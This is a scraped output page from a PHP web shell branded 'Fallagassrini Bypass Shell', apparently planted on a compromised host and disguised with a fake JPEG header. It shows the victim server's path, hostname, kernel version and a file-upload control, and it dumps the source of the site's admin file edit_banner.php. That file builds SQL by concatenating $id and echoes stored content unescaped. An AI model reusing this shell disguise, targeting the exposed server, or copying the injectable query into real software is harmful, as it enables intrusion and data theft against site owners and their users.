JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/public_html/application/views/admin/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/public_html/application/views/admin/edit_banner.php

<?php
$p_title='banner';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
    <title>Edit Banner</title>
    <link rel="stylesheet" href="<?php echo base_url(); ?>css/admin/style.css" media="all" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/jquery-ui/css/smoothness/jquery-ui-1.8.15.custom.css" type="text/css" /><link rel="stylesheet" href="<?php echo base_url(); ?>lib/datatables/css/table_jui.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/harvesthq-chosen/chosen.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/elfinder/css/elfinder.full.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/fancybox/jquery.fancybox-1.3.4.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/file-uploader/fileuploader.css" type="text/css" />
    <link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Open+Sans" type="text/css" />

    <script type="text/javascript" src="<?php echo base_url(); ?>js/admin/head.load.min.js"></script>
         <script type="text/javascript" src="<?php echo base_url(); ?>ckeditor/ckeditor.js"></script>

<script>
function form_validate()
{
		var title = document.register_form.title.value;
		var category =  document.register_form.category.value;
		if(title=='' || category==0)
		{
			document.getElementById("error").innerHTML ="Fill all the details";
			document.getElementById("error").style.display="block";
			return false;
		}
		document.getElementById("error").style.display="none";
		document.register_form.action="<?php echo base_url(); ?>admin/edit_banner/update/<?php echo $id; ?>";
		document.register_form.submit();
		
}
</script>

<script type="text/javascript" language="javascript">
function close_alert()
{
   document.getElementById("ok").style.display="none";
}
</script>
<script type="text/javascript" language="javascript">
function close_alert()
{
   document.getElementById("ok").style.display="none";
}
</script>

</head>
<body class="bg_c sidebar fluid">
<input type="hidden" value="<?php echo base_url(); ?>" id="url_val" />


 
                    
                    
                    
	<div id="main">
	<?php
include('header.php');
?>
		<div class="wrapper">
			<div id="main_section" class="cf brdrrad_a" style="width:98%;">

				<div id="content_wrapper">
				<div id="main_content" class="cf" style="margin-left:15px;">
               
                    <div  id="error" class="msg_box msg_error" style="display:none;"><img src="<?php echo base_url();?>images/blank.gif" class="msg_close" alt="" /></div>
                    <?php
					$set_b=$this->db->query("select * from tbl_banner where id='".$id."'");
					$num_b=$set_b->num_rows();
					if($num_b==0)
					{
					  echo "<script type='text/javascript'>window.location.href='".base_url()."admin/banner'</script>";
					}
					$row_b=$set_b->row_array();
					?>
                <form action="" method="post" class="formEl" id="form_static" enctype="multipart/form-data" onsubmit="return form_validate()" name="register_form">
							<div class="cf sepH_c">
								<div id="content_actions" class="fr">
									<button class="btn btn_d" type="submit" name="update" >Save</button>
                             
							
								</div>
								<h1 class="fl">Banners</h1>
							</div>

							

							<div class="msg_box msg_error" id="form_a_errors" style="display:none"></div>

							<div class="content_panes">

								<div id="tab-1">

									<div class="formEl_a">

										<fieldset>
											<legend>You can edit Banners Here...</legend>
											<div class="sepH_b">
												<label for="title" class="lbl_a">Content</label>
												
                                                <textarea name="title" class="inpt_a" id="title" ><?php echo $row_b['content']; ?></textarea>
												</div>
                                           
                                            
                                           <div class="sepH_c cf">
												<label for="text" class="lbl_a">Select Page</label><br />
                                             <select name="category" id="category" class="inpt_a" onchange="check_fn(this.value);" >
                                            <option value="0">--Select--</option>
                                           
                                            <option value="Home" <?php if($row_b['page']=='Home') echo "selected"; ?>>Home</option>
                                             <option value="About" <?php if($row_b['page']=='About') echo "selected"; ?>>About</option>
                                              <option value="Service" <?php if($row_b['page']=='Service') echo "selected"; ?>>Service</option>
                                              <option value="Car" <?php if($row_b['page']=='Car') echo "selected"; ?>>Car</option>
                                               <option value="Contact" <?php if($row_b['page']=='Contact') echo "selected"; ?>>Contact</option>
                                              </select> 
											</div>
                                               
											<div class="sepH_c cf">
												<label for="text" class="lbl_a">Image</label>
                                           <input type="file" name="file" class="input_a" />     
                                       <img src="<?php echo base_url(); ?>uploads/<?php echo $row_b['image']; ?>" style="max-height:100px; max-width:130px;" />
				
											</div>
                                         
										</fieldset>

									</div>


									

									
								</div>

								

							</div>
						</form>
					</div>
				</div>
				
                
      <!----------------------------------------------End of Form---------------------------------------------------------------->
                
				</div>
                
                

				

			</div>
		</div>
	</div>

	<script type="text/javascript">
		head.js(
			"<?php echo base_url(); ?>js/admin/jquery-1.6.2.min.js",
			"<?php echo base_url(); ?>lib/datatables/jquery.dataTables.min.js",
			"<?php echo base_url(); ?>lib/datatables/dataTables.plugins.js",
			"<?php echo base_url(); ?>lib/fusion-charts/FusionCharts.js",
			
			"<?php echo base_url(); ?>js/admin/jquery.microaccordion.js",
			"<?php echo base_url(); ?>js/admin/jquery.tools.min.js",
			"<?php echo base_url(); ?>js/admin/jquery.stickyPanel.js",
			"<?php echo base_url(); ?>js/admin/jquery.text-overflow.min.js",
			"<?php echo base_url(); ?>js/admin/xbreadcrumbs.js",
			"<?php echo base_url(); ?>js/admin/jquery.stickyPanel.js",
			"<?php echo base_url(); ?>js/admin/lagu.js",
			"<?php echo base_url(); ?>lib/fancybox/jquery.fancybox-1.3.4.pack.js",
			function(){
				lga_dataTables.lga_contentTable();
				lga_fusionCharts.chart_k();
				
				/*
				{
				   "bSort": false,
					"aLengthMenu": [
						[10, 15],
						[10, 15]
					],
				  "iDisplayLength":10
				}
				*/
				
				$('#content_table3').dataTable();
				$('#content_table5').dataTable();
				
				$("#fancy_login_form").fancybox({
				
					'transitionIn'	: 'fade',
					'scrolling'		: 'no',
					'titleShow'		: false,
					'overlayOpacity'	: '0',
					'hideOnOverlayClick': false,
					'onClosed'		: function() {
						$("#login_error").hide();
					}
				});
				//simple validation
				$("#login_form").bind("submit", function() {
				
					if ($("#login_name").val().length < 1 || $("#login_pass").val().length < 1) {
						$("#login_error").show();
						$.fancybox.resize();
						return false;
					}
					$.fancybox.showActivity();
					$.ajax({
						type	: "POST",
						cache	: false,
						url		: "helper_serialize.php",
						data	: $(this).serializeArray(),
						success: function(data) {
							$.fancybox(data,{
								'overlayOpacity'	: '0',
								'hideOnOverlayClick': false
							});
						}
					});
					return false;
				});
				
				
			}
			
			
			
		)
    </script>
     <script type="text/javascript">
   function check_fn(category)
   {
    
       if(category!='Home')
	   {
		  
			  var url = "<?php echo base_url();?>admin/banner/check/"+category;
			  
			   $.post( url, { category:category },
				function( data ) {
				if(data==1)
				{
				        alert("You have already added banner for"+category+". Please delete previous one");
						document.getElementById("category").value=0;
				        return false;
				}
			
				});
	    }	
   }
   </script>
</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net